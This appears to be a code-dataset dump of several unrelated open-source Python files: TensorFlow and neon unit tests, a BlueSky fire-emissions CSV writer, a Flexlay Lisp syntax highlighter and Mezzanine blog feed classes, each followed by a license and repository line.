# Copyright 2017 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Tests for VectorSinhArcsinhDiag.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import numpy as np from tensorflow.contrib import distributions from tensorflow.contrib.distributions.python.ops import test_util from tensorflow.python.platform import test ds = distributions rng = np.random.RandomState(123) class VectorSinhArcsinhDiagTest(test_util.VectorDistributionTestHelpers, test.TestCase): def test_default_is_same_as_normal(self): d = 10 scale_diag = rng.rand(d) scale_identity_multiplier = np.float64(1.0) loc = rng.randn(d) with self.cached_session() as sess: norm = ds.MultivariateNormalDiag( loc=loc, scale_diag=scale_diag, scale_identity_multiplier=scale_identity_multiplier, validate_args=True) sasnorm = ds.VectorSinhArcsinhDiag( loc=loc, scale_diag=scale_diag, scale_identity_multiplier=scale_identity_multiplier, validate_args=True) x = rng.randn(5, d) norm_pdf, sasnorm_pdf = sess.run([norm.prob(x), sasnorm.prob(x)]) self.assertAllClose(norm_pdf, sasnorm_pdf) norm_samps, sasnorm_samps = sess.run( [norm.sample(10000, seed=0), sasnorm.sample(10000, seed=0)]) self.assertAllClose(loc, sasnorm_samps.mean(axis=0), atol=0.1) self.assertAllClose( norm_samps.mean(axis=0), sasnorm_samps.mean(axis=0), atol=0.1) self.assertAllClose( norm_samps.std(axis=0), sasnorm_samps.std(axis=0), atol=0.1) def test_passing_in_laplace_plus_defaults_is_same_as_laplace(self): d = 10 scale_diag = rng.rand(d) scale_identity_multiplier = np.float64(1.2) loc = rng.randn(d) with self.cached_session() as sess: vlap = ds.VectorLaplaceDiag( loc=loc, scale_diag=scale_diag, scale_identity_multiplier=scale_identity_multiplier, validate_args=True) sasvlap = ds.VectorSinhArcsinhDiag( loc=loc, scale_diag=scale_diag, scale_identity_multiplier=scale_identity_multiplier, distribution=ds.Laplace(np.float64(0.), np.float64(1.)), validate_args=True) x = rng.randn(5, d) vlap_pdf, sasvlap_pdf = sess.run([vlap.prob(x), sasvlap.prob(x)]) self.assertAllClose(vlap_pdf, sasvlap_pdf) vlap_samps, sasvlap_samps = sess.run( [vlap.sample(10000, seed=0), sasvlap.sample(10000, seed=0)]) self.assertAllClose(loc, sasvlap_samps.mean(axis=0), atol=0.1) self.assertAllClose( vlap_samps.mean(axis=0), sasvlap_samps.mean(axis=0), atol=0.1) self.assertAllClose( vlap_samps.std(axis=0), sasvlap_samps.std(axis=0), atol=0.1) def test_tailweight_small_gives_fewer_outliers_than_normal(self): d = 10 scale_diag = rng.rand(d) scale_identity_multiplier = np.float64(0.9) loc = rng.randn(d) with self.cached_session() as sess: norm = ds.MultivariateNormalDiag( loc=loc, scale_diag=scale_diag, scale_identity_multiplier=scale_identity_multiplier, validate_args=True) sasnorm = ds.VectorSinhArcsinhDiag( loc=loc, scale_diag=scale_diag, scale_identity_multiplier=scale_identity_multiplier, tailweight=0.1, validate_args=True) # sasnorm.pdf(x) is smaller on outliers (+-10 are outliers) x = np.float64([[-10] * d, [10] * d]) # Shape [2, 10] norm_lp, sasnorm_lp = sess.run([norm.log_prob(x), sasnorm.log_prob(x)]) np.testing.assert_array_less(sasnorm_lp, norm_lp) # 0.1% quantile and 99.9% quantile are outliers, and should be more # extreme in the normal. The 97.772% quantiles should be the same. norm_samps, sasnorm_samps = sess.run( [norm.sample(int(5e5), seed=1), sasnorm.sample(int(5e5), seed=1)]) np.testing.assert_array_less( np.percentile(norm_samps, 0.1, axis=0), np.percentile(sasnorm_samps, 0.1, axis=0)) np.testing.assert_array_less( np.percentile(sasnorm_samps, 99.9, axis=0), np.percentile(norm_samps, 99.9, axis=0)) # 100. * sp.stats.norm.cdf(2.) q = 100 * 0.97724986805182079 self.assertAllClose( np.percentile(sasnorm_samps, q, axis=0), np.percentile(norm_samps, q, axis=0), rtol=0.03) self.assertAllClose( np.percentile(sasnorm_samps, 100 - q, axis=0), np.percentile(norm_samps, 100 - q, axis=0), rtol=0.03) def test_tailweight_large_gives_more_outliers_than_normal(self): d = 10 scale_diag = rng.rand(d) scale_identity_multiplier = np.float64(1.0) loc = rng.randn(d) with self.cached_session() as sess: norm = ds.MultivariateNormalDiag( loc=loc, scale_diag=scale_diag, scale_identity_multiplier=scale_identity_multiplier, validate_args=True) sasnorm = ds.VectorSinhArcsinhDiag( loc=loc, scale_diag=scale_diag, scale_identity_multiplier=scale_identity_multiplier, tailweight=3., validate_args=True) # norm.pdf(x) is smaller on outliers (+-10 are outliers) x = np.float64([[-10] * d, [10] * d]) # Shape [2, 10] norm_lp, sasnorm_lp = sess.run([norm.log_prob(x), sasnorm.log_prob(x)]) np.testing.assert_array_less(norm_lp, sasnorm_lp) # 0.1% quantile and 99.9% quantile are outliers, and should be more # extreme in the sasnormal. The 97.772% quantiles should be the same. norm_samps, sasnorm_samps = sess.run( [norm.sample(int(5e5), seed=2), sasnorm.sample(int(5e5), seed=2)]) np.testing.assert_array_less( np.percentile(sasnorm_samps, 0.1, axis=0), np.percentile(norm_samps, 0.1, axis=0)) np.testing.assert_array_less( np.percentile(norm_samps, 99.9, axis=0), np.percentile(sasnorm_samps, 99.9, axis=0)) # 100. * sp.stats.norm.cdf(2.) q = 100 * 0.97724986805182079 self.assertAllClose( np.percentile(sasnorm_samps, q, axis=0), np.percentile(norm_samps, q, axis=0), rtol=0.03) self.assertAllClose( np.percentile(sasnorm_samps, 100 - q, axis=0), np.percentile(norm_samps, 100 - q, axis=0), rtol=0.03) def test_positive_skewness_moves_mean_to_the_right(self): d = 10 scale_diag = rng.rand(d) scale_identity_multiplier = np.float64(1.0) loc = rng.randn(d) with self.cached_session() as sess: sasnorm = ds.VectorSinhArcsinhDiag( loc=loc, scale_diag=scale_diag, scale_identity_multiplier=scale_identity_multiplier, skewness=3.0, validate_args=True) sasnorm_samps = sess.run(sasnorm.sample(10000, seed=4)) np.testing.assert_array_less(loc, sasnorm_samps.mean(axis=0)) def test_consistency_random_parameters_with_batch_dim(self): b, d = 5, 2 scale_diag = rng.rand(b, d) scale_identity_multiplier = np.float64(1.1) with self.cached_session() as sess: sasnorm = ds.VectorSinhArcsinhDiag( scale_diag=scale_diag, scale_identity_multiplier=scale_identity_multiplier, skewness=rng.randn(d) * 0.5, tailweight=rng.rand(b, d) + 0.7, validate_args=True) self.run_test_sample_consistent_log_prob( sess.run, sasnorm, radius=1.0, center=0., rtol=0.1) self.run_test_sample_consistent_log_prob( sess.run, sasnorm, radius=1.0, center=-0.15, rtol=0.1) self.run_test_sample_consistent_log_prob( sess.run, sasnorm, radius=1.0, center=0.15, rtol=0.1) def test_consistency_random_parameters_no_batch_dims(self): d = 3 scale_diag = rng.rand(d) scale_identity_multiplier = np.float64(1.1) with self.cached_session() as sess: sasnorm = ds.VectorSinhArcsinhDiag( scale_diag=scale_diag, scale_identity_multiplier=scale_identity_multiplier, skewness=rng.randn(d) * 0.5, tailweight=rng.rand(d) + 0.7, validate_args=True) self.run_test_sample_consistent_log_prob( sess.run, sasnorm, radius=1.0, center=0., rtol=0.1) self.run_test_sample_consistent_log_prob( sess.run, sasnorm, radius=1.0, center=-0.15, rtol=0.1) self.run_test_sample_consistent_log_prob( sess.run, sasnorm, radius=1.0, center=0.15, rtol=0.1) def test_pdf_reflected_for_negative_skewness(self): with self.cached_session() as sess: sas_pos_skew = ds.VectorSinhArcsinhDiag( loc=[0.], scale_identity_multiplier=1., skewness=2., validate_args=True) sas_neg_skew = ds.VectorSinhArcsinhDiag( loc=[0.], scale_identity_multiplier=1., skewness=-2., validate_args=True) x = np.linspace(-2, 2, num=5).astype(np.float32).reshape(5, 1) self.assertAllClose( *sess.run([sas_pos_skew.prob(x), sas_neg_skew.prob(x[::-1])])) if __name__ == "__main__": test.main()
apache-2.0
kashif/neon
neon/layers/tests/test_fully_connected.py
9
3084
#!/usr/bin/env python # ---------------------------------------------------------------------------- # Copyright 2014 Nervana Systems Inc. # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ---------------------------------------------------------------------------- from nose.plugins.attrib import attr from neon.backends.cpu import CPU from neon.layers import FCLayer from neon.params import IdentityValGen from neon.util.testing import assert_tensor_equal nin = 3 nout = 2 batch_size = 10 def check_fprop(layer, backend): inputs = backend.ones((nin, batch_size)) output = backend.ones((nout, batch_size)) layer.fprop(inputs) assert_tensor_equal(layer.output, output) def check_bprop(layer, backend): errors = backend.ones((nout, batch_size)) deltas = backend.zeros((nin, batch_size)) deltas[:2] = backend.ones((nout, batch_size)) # initialize deltas since they are not set # by the layer initialize method. layer.deltas = backend.ones((nin, batch_size)) # layers should be refactored to remove references # to external layers. inputs can be cached during # fprop. class PreviousLayer(object): def __init__(self): self.is_data = True self.output = backend.ones((nin, batch_size)) layer.prev_layer = PreviousLayer() layer.bprop(errors) assert_tensor_equal(layer.deltas, deltas) class TestFullyConnectedLayer(object): def create_layer(self, backend): weight_init = IdentityValGen() layer = FCLayer(nin=nin, nout=nout, batch_size=batch_size, weight_init=weight_init, backend=backend) layer.set_weight_shape() layer.initialize([]) return layer def test_cpu_fprop(self): backend = CPU(rng_seed=0) layer = self.create_layer(backend=backend) check_fprop(layer, backend) def test_cpu_bprop(self): backend = CPU(rng_seed=0) layer = self.create_layer(backend=backend) check_bprop(layer, backend) @attr('cuda') def test_gpu_fprop(self): from neon.backends.cc2 import GPU backend = GPU(rng_seed=0) layer = self.create_layer(backend=backend) check_fprop(layer, backend) @attr('cuda') def test_gpu_bprop(self): from neon.backends.cc2 import GPU backend = GPU(rng_seed=0) layer = self.create_layer(backend=backend) check_bprop(layer, backend)
apache-2.0
pnwairfire/bluesky
bluesky/extrafilewriters/firescsvs.py
1
15135
"""bluesky.extrafilewriters.firescsvs Writes fire emissions csv file in the form: fire_id,hour,ignition_date_time,date_time,area_fract,flame_profile,smolder_profile,residual_profile,pm25_emitted,pm10_emitted,co_emitted,co2_emitted,ch4_emitted,nox_emitted,nh3_emitted,so2_emitted,voc_emitted,pm25_flame,pm10_flame,co_flame,co2_flame,ch4_flame,nox_flame,nh3_flame,so2_flame,voc_flame,pm25_smold,pm10_smold,co_smold,co2_smold,ch4_smold,nox_smold,nh3_smold,so2_smold,voc_smold,pm25_resid,pm10_resid,co_resid,co2_resid,ch4_resid,nox_resid,nh3_resid,so2_resid,voc_resid,smoldering_fraction,heat,percentile_000,percentile_005,percentile_010,percentile_015,percentile_020,percentile_025,percentile_030,percentile_035,percentile_040,percentile_045,percentile_050,percentile_055,percentile_060,percentile_065,percentile_070,percentile_075,percentile_080,percentile_085,percentile_090,percentile_095,percentile_100 SF11C38780083219874810,0,201803170000-08:00,201803170000-08:00,0.0057,0.0057,0.0057,0.0057,0.009475,0.011181,0.10173,1.720376,0.005177,0.00232,0.001688,0.001049,0.024262,0.006488,0.007655,0.063984,1.470124,0.003404,0.002157,0.001075,0.000873,0.015454,0.001597,0.001885,0.02018,0.133793,0.000948,8.7e-05,0.000328,9.4e-05,0.004709,0.00139,0.001641,0.017566,0.116459,0.000825,7.6e-05,0.000285,8.2e-05,0.004099,0.981589,193672.799534,1.937531,2.07856035,2.2195897,2.36061905,2.5016484,2.64267775,2.7837071,2.92473645,3.0657658,3.20679515,3.3478245,3.48885385,3.6298832,3.77091255,3.9119419,4.05297125,4.1940006,4.33502995,4.4760593,4.61708865,4.758118 SF11C38780083219874810,1,201803170000-08:00,201803170100-08:00,0.0057,0.0057,0.0057,0.0057,0.009475,0.011181,0.10173,1.720376,0.005177,0.00232,0.001688,0.001049,0.024262,0.006488,0.007655,0.063984,1.470124,0.003404,0.002157,0.001075,0.000873,0.015454,0.001597,0.001885,0.02018,0.133793,0.000948,8.7e-05,0.000328,9.4e-05,0.004709,0.00139,0.001641,0.017566,0.116459,0.000825,7.6e-05,0.000285,8.2e-05,0.004099,0.981589,193672.799534,1.937531,2.0958799,2.2542288,2.4125777,2.5709266,2.7292755,2.8876244,3.0459733,3.2043222,3.3626711,3.52102,3.6793689,3.8377178,3.9960667,4.1544156,4.3127645,4.4711134,4.6294623,4.7878112,4.9461601,5.104509 SF11C38780083219874810,2,201803170000-08:00,201803170200-08:00,0.0057,0.0057,0.0057,0.0057,0.009475,0.011181,0.10173,1.720376,0.005177,0.00232,0.001688,0.001049,0.024262,0.006488,0.007655,0.063984,1.470124,0.003404,0.002157,0.001075,0.000873,0.015454,0.001597,0.001885,0.02018,0.133793,0.000948,8.7e-05,0.000328,9.4e-05,0.004709,0.00139,0.001641,0.017566,0.116459,0.000825,7.6e-05,0.000285,8.2e-05,0.004099,0.987726,129115.199689,1.937531,2.04076465,2.1439983,2.24723195,2.3504656,2.45369925,2.5569329,2.66016655,2.7634002,2.86663385,2.9698675,3.07310115,3.1763348,3.27956845,3.3828021,3.48603575,3.5892694,3.69250305,3.7957367,3.89897035,4.002204 ... """ import csv import logging import os from afdatetime import parsing as datetime_parsing from blueskykml import fires as blueskykml_fires from bluesky import locationutils from bluesky.config import Config BLUESKYKML_DATE_FORMAT = blueskykml_fires.FireData.date_time_format # as of blueskykml v0.2.5, this list is: # 'pm25', 'pm10', 'co', 'co2', 'ch4', 'nox', 'nh3', 'so2', 'voc' # Note that blueskykml expects 'pm25', not 'pm2.5' BLUESKYKML_SPECIES_LIST = [s.upper() for s in blueskykml_fires.FireData.emission_fields] if 'NOX' in BLUESKYKML_SPECIES_LIST: BLUESKYKML_SPECIES_LIST.remove('NOX') BLUESKYKML_SPECIES_LIST.append('NOx') ## ## Functions for extracting fire *location * information to write to csv files ## ## Note: The activity object (arg 'g') is ignored in most of these methods. ## It's only needed for the start time and area calculation ## def _pick_representative_fuelbed(fire, loc): fuelbeds = [f for f in loc.get('fuelbeds', []) if hasattr(f.get('pct', 0.0), 'real') and f.get('fccs_id')] if fuelbeds: fuelbeds = sorted(fuelbeds, key=lambda fb: fb.get('pct', 0.0), reverse=True) return fuelbeds[0]['fccs_id'] def _get_fuelbed_fractions(fire, loc): fuelbeds = [f for f in loc.get('fuelbeds', []) if hasattr(f.get('pct', 0.0), 'real') and f.get('fccs_id')] if fuelbeds: fuelbeds = sorted(fuelbeds, key=lambda fb: fb.get('pct', 0.0), reverse=True) fuelbed_fractions = '' for fb in fuelbeds: fuelbed_fractions += str(fb["fccs_id"]) + ' ' + str(round(fb['pct']/100,2)) + '; ' return fuelbed_fractions.rstrip("; ") def _get_heat(fire, loc): if loc.get('fuelbeds'): heat = [fb.get('heat', {}).get('total') for fb in loc['fuelbeds']] # non-None value will be returned if species is defined for all fuelbeds if not any([v is None for v in heat]): # heat is array of arrays return sum([sum(h) for h in heat]) def _get_consumption_field(field): def f(fire, loc): # If consumption is already summarized for this activity # window, return summary value if loc.get('consumption') and loc['consumption'].get('summary'): return loc['consumption']['summary'].get(field) # Otherwise, iterate through fuelbeds, fuel categories, and # fuel subcategories elif loc.get('fuelbeds'): try: val = 0.0 for fb in loc['fuelbeds']: for cat_dict in fb['consumption'].values(): for subcat_dict in cat_dict.values(): if field == 'total': val = sum([e[0] for e in subcat_dict.values()]) else: val += subcat_dict[field][0] return val except Exception as e: logging.warning("Failed to sum '{}' consumption " "for fire {}: {}".format(field, fire.id, e)) return f def _get_emissions_species(species): # TODO: if any fuelbed has species undefined, abort and set fire'set # cumulative value to None ? def f(fire, loc): if loc.get('fuelbeds'): species_array = [] for fb in loc['fuelbeds']: total = fb.get('emissions', {}).get('total', {}) # Try species as is, as all lowercase, and as all uppercase # append even if not defined, since we check bdlow if all or none species_array.append( total.get(species) or total.get(species.lower()) or total.get(species.upper()) ) # non-None value will be returned if species is defined for all fuelbeds if not any([v is None for v in species_array]): return sum([sum(a) for a in species_array]) return f def _get_location_value(key, is_float): def f(fire, loc): val = loc.get(key) if val: return float(val) if is_float else val return f # Fire locations csv columns from BSF: # id,event_id,latitude,longitude,type,area,date_time,elevation,slope, # state,county,country,fips,scc,fuel_1hr,fuel_10hr,fuel_100hr,fuel_1khr, # fuel_10khr,fuel_gt10khr,shrub,grass,rot,duff,litter,moisture_1hr, # moisture_10hr,moisture_100hr,moisture_1khr,moisture_live,moisture_duff, # consumption_flaming,consumption_smoldering,consumption_residual, # consumption_duff,min_wind,max_wind,min_wind_aloft,max_wind_aloft, # min_humid,max_humid,min_temp,max_temp,min_temp_hour,max_temp_hour, # sunrise_hour,sunset_hour,snow_month,rain_days,heat,pm25,pm10,co,co2, # ch4,nox,nh3,so2,voc,canopy,event_url,fccs_number,owner,sf_event_guid, # sf_server,sf_stream_name,timezone,veg FIRE_LOCATIONS_CSV_FIELDS = ( [ ('id', lambda f, loc: f.id), ('event_id', lambda f, loc: f.get('event_of', {}).get('id')), ('latitude', lambda f, loc: locationutils.LatLng(loc).latitude), ('longitude', lambda f, loc: locationutils.LatLng(loc).longitude), ('utc_offset', lambda f, loc: loc.get('utc_offset')), ('source', lambda f, loc: loc.get('source')), # Note: We're keeping the 'type' field consistent with the csv files # generated by smartfire, which use 'RX' and 'WF' ('type', lambda f, loc: 'RX' if f.type == 'rx' else 'WF'), ('date_time', lambda f, loc: datetime_parsing.parse(loc['start']).strftime(BLUESKYKML_DATE_FORMAT)), ('event_name', lambda f, loc: f.get('event_of', {}).get('name')), ('fccs_number', _pick_representative_fuelbed), ('fuelbed_fractions', _get_fuelbed_fractions), # TDOO: add 'VEG'? (Note: sf2 has 'veg' field, but # it seems to be a fuelbed discription which is probably for # the one fccs id in the sf2 feed. This single fccs id and its description # don't necesasrily represent the entire fire area, which could have # multiple fuelbeds. we could set 'VEG' to # a concatenation of the fuelbeds or the one one making up the largest # fraction of the fire.) ('heat', _get_heat) ] # emissions + [ (s.lower(), _get_emissions_species('PM2.5' if s == 'pm25' else s)) for s in BLUESKYKML_SPECIES_LIST if s ] # consumption + [ ('consumption_' + k, _get_consumption_field(k)) for k in [ # Note: BSF included 'consumption_duff', but duff values # aren't readily available in pipeline output 'total', 'flaming', 'smoldering', 'residual' ] ] # float value location fields + [ (k, _get_location_value(k, True)) for k in [ 'area', 'elevation', 'slope', 'moisture_1hr','moisture_10hr', 'moisture_100hr','moisture_1khr', 'moisture_live','moisture_duff', 'canopy_consumption_pct', 'min_wind','max_wind', 'min_wind_aloft', 'max_wind_aloft', 'min_humid','max_humid', 'min_temp','max_temp', 'min_temp_hour','max_temp_hour', 'sunrise_hour','sunset_hour', 'snow_month','rain_days' ] ] # string value location fields + [ (k, _get_location_value(k, False)) for k in [ 'state', 'county', 'country' ] ] # TODO: Add other fields if users want them # TODO: add other sf2 fields # 'fuel_1hr', 'fuel_10hr', 'fuel_100hr', # 'fuel_1khr', 'fuel_10khr', 'fuel_gt10khr' # 'canopy','shrub','grass','rot','duff', 'litter', 'VEG', # 'heat','owner','sf_event_guid','sf_server', # 'sf_stream_name','fips','scc' ) """List of fire location csv fields, with function to extract from fire object""" ## ## Functions for extracting fire *event* information to write to csv files ## def _assign_event_name(event, fire_loc): name = fire_loc.get('event_name') if name: if event.get('name') and name != event['name']: logging.warning("Fire {} event name conflict: '{}' != '{}'".format( fire_loc['id'], name, event['name'])) return name def _update_event_area(event, fire_loc): if fire_loc['area'] is None: raise ValueError("Fire {} location lacks area".format(fire_loc['id'])) return event.get('total_area', 0.0) + fire_loc['area'] def _update_total_heat(event, fire_loc): if 'total_heat' in event and event['total_heat'] is None: # previous fire didn't have heat defined; abort so # that we don't end up with misleading partial heat return logging.debug("total fire heat: %s", fire_loc.get('heat')) if fire_loc.get('heat'): return event.get('total_heat', 0.0) + fire_loc['heat'] def _update_total_emissions_species(species): key = 'total_{}'.format(species) def f(event, fire_loc): if key in event and event[key] is None: # previous fire didn't have this emissions value defined; abort so # that we don't end up with misleading partial total return if not fire_loc.get(species): # this fire doesn't have this emissions value defined; abort, # throwing away whatever is recorded in event[key], so # that we don't end up with misleading partial total return return event.get(key, 0.0) + fire_loc[species] return f # Fire events csv columns from BSF: # id,event_name,total_area,total_heat,total_pm25,total_pm10,total_pm, # total_co,total_co2,total_ch4,total_nmhc,total_nox,total_nh3,total_so2, # total_voc,total_bc,total_h2,total_nmoc,total_no,total_no2,total_oc, # total_tpc,total_tpm FIRE_EVENTS_CSV_FIELDS = [ ('name', _assign_event_name), ('total_heat', _update_total_heat), ('total_area', _update_event_area), ('total_nmhc', _update_total_emissions_species('nmhc')) ] + [ ('total_{}'.format(s.lower()), _update_total_emissions_species(s.lower())) for s in BLUESKYKML_SPECIES_LIST ] """List of fire event csv fields, with function to extract from fire object and aggregate. Note that this list lacks 'id', which is the first column. """ ## ## Writer class ## class FiresCsvsWriter(object): def __init__(self, dest_dir, **kwargs): fl = (kwargs.get('fire_locations_filename') or Config().get('extrafiles', 'firescsvs', 'fire_locations_filename')) self._fire_locations_pathname = os.path.join(dest_dir, fl) fe = (kwargs.get('fire_events_filename') or Config().get('extrafiles', 'firescsvs', 'fire_events_filename')) self._fire_events_pathname = os.path.join(dest_dir, fe) def write(self, fires_manager): fires, events = self._collect_csv_fields(fires_manager.fires) with open(self._fire_locations_pathname, 'w', encoding="utf-8") as _f: f = csv.writer(_f) f.writerow([k for k, l in FIRE_LOCATIONS_CSV_FIELDS]) for fire in fires: f.writerow([str(fire[k] or '') for k, l in FIRE_LOCATIONS_CSV_FIELDS]) with open(self._fire_events_pathname, 'w', encoding="utf-8") as _f: f = csv.writer(_f) f.writerow(['id'] + [k for k, l in FIRE_EVENTS_CSV_FIELDS]) for e_id, event in list(events.items()): f.writerow([e_id] + [str(event[k] or '') for k, l in FIRE_EVENTS_CSV_FIELDS]) def _collect_csv_fields(self, fires): # As we iterate through fires, collecting necessary fields, collect # events information as well fires_fields = [] for fire in fires: for loc in fire.locations: fires_fields.append({k: l(fire, loc) or '' for k, l in FIRE_LOCATIONS_CSV_FIELDS}) events_fields = {} for ff in fires_fields: e_id = ff.get('event_id') if e_id: events_fields[e_id] = events_fields.get(e_id, {}) for k, l in FIRE_EVENTS_CSV_FIELDS: events_fields[e_id][k] = l(events_fields[e_id], ff) logging.debug("events: %s", events_fields) return fires_fields, events_fields
gpl-3.0
SuperTux/flexlay
text_editor/highlighters/lisp_highlighter.py
1
4604
# Flexlay - A Generic 2D Game Editor # Copyright (C) 2015 Karkus476 <karkus476@yahoo.com> # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. import json, re from PyQt4.QtGui import (QSyntaxHighlighter, QTextCharFormat, QFont) from PyQt4.QtCore import Qt from supertux.highlighter import SuperTuxHighlighter, HighlightingRule class SuperTuxLispHighlighter(SuperTuxHighlighter): @staticmethod def clean_text(text): state = 0 tiles = text.find("(tiles") while tiles != -1: close_bracket = text.find(")", tiles) assert close_bracket >= 0 before_length = len(text) text = text[:tiles] + "(tiles"+ text[close_bracket:] after_length = len(text) delta_length = before_length - after_length tiles = text.find("(tiles", close_bracket - delta_length) return text @staticmethod def load_tree_json(filename=None): if not filename or filename[-5:] is not ".json": filename = "highlighters/patterns2.json" patterns_file = open(filename, "r") pattern_tree = json.loads(patterns_file.read()) return pattern_tree @staticmethod def search_tree(tree, tag_list): ''' Searches a tree to find a tag :param tag_list: ["supertux-level", "sector", "name"] :return: QTextCharFormat if possible, else None ''' if tag_list[0] != "supertux-level": print("lisp_highlighter.py Line 53, tag_list is not from a supertux-level") return None tree=tree[tag_list.pop(0)] try: while len(tag_list) > 0: tree = tree["branches"][tag_list.pop(0)] except KeyError: return None colour = tree["color"] format = QTextCharFormat() if colour == "black": format.setForeground(Qt.black) elif colour == "blue": format.setForeground(Qt.blue) elif colour == "red": format.setForeground(Qt.red) elif colour == "green": format.setForeground(Qt.green) elif colour == "darkGreen": format.setForeground(Qt.darkGreen) elif colour == "darkBlue": format.setForeground(Qt.darkBlue) elif colour == "darkRed": format.setForeground(Qt.darkRed) elif colour == "magenta": format.setForeground(Qt.magenta) if tree["bold"]: format.setFontWeight(QFont.Bold) if tree["italic"]: format.setFontItalic(True) return format def __init__(self, text_edit, level_file): super().__init__(text_edit) text = level_file.read() text = SuperTuxLispHighlighter.clean_text(text) text_edit.setText(text) self.highlighting_rules += SuperTuxHighlighter.load_patterns("highlighters/patterns.json") string_format = QTextCharFormat() string_format.setForeground(Qt.darkRed) string_pattern = '"' self.string = HighlightingRule(string_pattern, string_format, "string") # comment_format = QTextCharFormat() # comment_format.setForeground(Qt.darkRed) # comment_pattern = r';.*' # comment = HighlightingRule(comment_pattern, comment_format) # # self.highlighting_rules.append(comment) #tree_json = SuperTuxLispHighlighter.load_tree_json() #SuperTuxLispHighlighter.search_tree(tree_json,["supertux-level", "sector", "name"]) def highlightBlock(self, text): for rule in self.highlighting_rules: search = re.search(rule.pattern, text) span = None if not search else search.span() while span: length = span[1] - span[0] self.setFormat(span[0], length, rule.format) search = re.search(rule.pattern, text[span[1]:]) span = None if not search else search.span() self.setCurrentBlockState(0) # EOF #
gpl-3.0
ryneeverett/mezzanine
mezzanine/blog/feeds.py
3
5107
from __future__ import unicode_literals from django.contrib.auth import get_user_model from django.contrib.sites.models import Site from django.contrib.syndication.views import Feed, add_domain from django.core.urlresolvers import reverse from django.shortcuts import get_object_or_404 from django.utils.feedgenerator import Atom1Feed from django.utils.html import strip_tags from mezzanine.blog.models import BlogPost, BlogCategory from mezzanine.conf import settings from mezzanine.core.templatetags.mezzanine_tags import richtext_filters from mezzanine.core.request import current_request from mezzanine.generic.models import Keyword from mezzanine.utils.html import absolute_urls from mezzanine.utils.sites import current_site_id User = get_user_model() try: unicode except NameError: # Python 3 unicode = lambda s: s class PostsRSS(Feed): """ RSS feed for all blog posts. """ def __init__(self, *args, **kwargs): """ Use the title and description of the Blog page for the feed's title and description. If the blog page has somehow been removed, fall back to the ``SITE_TITLE`` and ``SITE_TAGLINE`` settings. """ self.tag = kwargs.pop("tag", None) self.category = kwargs.pop("category", None) self.username = kwargs.pop("username", None) super(PostsRSS, self).__init__(*args, **kwargs) self._public = True page = None if "mezzanine.pages" in settings.INSTALLED_APPS: from mezzanine.pages.models import Page try: page = Page.objects.published().get(slug=settings.BLOG_SLUG) except Page.DoesNotExist: pass else: self._public = not page.login_required if self._public: if page is not None: self._title = "%s | %s" % (page.title, settings.SITE_TITLE) self._description = strip_tags(page.description) else: self._title = settings.SITE_TITLE self._description = settings.SITE_TAGLINE def __call__(self, *args, **kwarg): self._request = current_request() self._site = Site.objects.get(id=current_site_id()) return super(PostsRSS, self).__call__(*args, **kwarg) def add_domain(self, link): return add_domain(self._site.domain, link, self._request.is_secure()) def title(self): return unicode(self._title) def description(self): return unicode(self._description) def link(self): return self.add_domain(reverse("blog_post_list")) def items(self): if not self._public: return [] blog_posts = BlogPost.objects.published().select_related("user" ).prefetch_related("categories") if self.tag: tag = get_object_or_404(Keyword, slug=self.tag) blog_posts = blog_posts.filter(keywords__keyword=tag) if self.category: category = get_object_or_404(BlogCategory, slug=self.category) blog_posts = blog_posts.filter(categories=category) if self.username: author = get_object_or_404(User, username=self.username) blog_posts = blog_posts.filter(user=author) limit = settings.BLOG_RSS_LIMIT if limit is not None: blog_posts = blog_posts[:settings.BLOG_RSS_LIMIT] return blog_posts def item_description(self, item): description = richtext_filters(item.content) absolute_urls_name = "mezzanine.utils.html.absolute_urls" if absolute_urls_name not in settings.RICHTEXT_FILTERS: description = absolute_urls(description) return unicode(description) def categories(self): if not self._public: return [] return BlogCategory.objects.all() def feed_url(self): return self.add_domain(self._request.path) def item_link(self, item): return self.add_domain(super(PostsRSS, self).item_link(item)) def item_author_name(self, item): return item.user.get_full_name() or item.user.username def item_author_link(self, item): username = item.user.username link = reverse("blog_post_list_author", kwargs={"username": username}) return self.add_domain(link) def item_pubdate(self, item): return item.publish_date def item_categories(self, item): return item.categories.all() def item_enclosure_url(self, item): if item.featured_image: return self.add_domain(item.featured_image.url) def item_enclosure_length(self, item): if item.featured_image: return item.featured_image.size def item_enclosure_mime_type(self, item): if item.featured_image: return item.featured_image.mimetype[0] class PostsAtom(PostsRSS): """ Atom feed for all blog posts. """ feed_type = Atom1Feed def subtitle(self): return self.description() def item_updateddate(self, item): return item.updated
bsd-2-clause
rezoo/chainer
tests/chainer_tests/test_reporter.py
1
15144
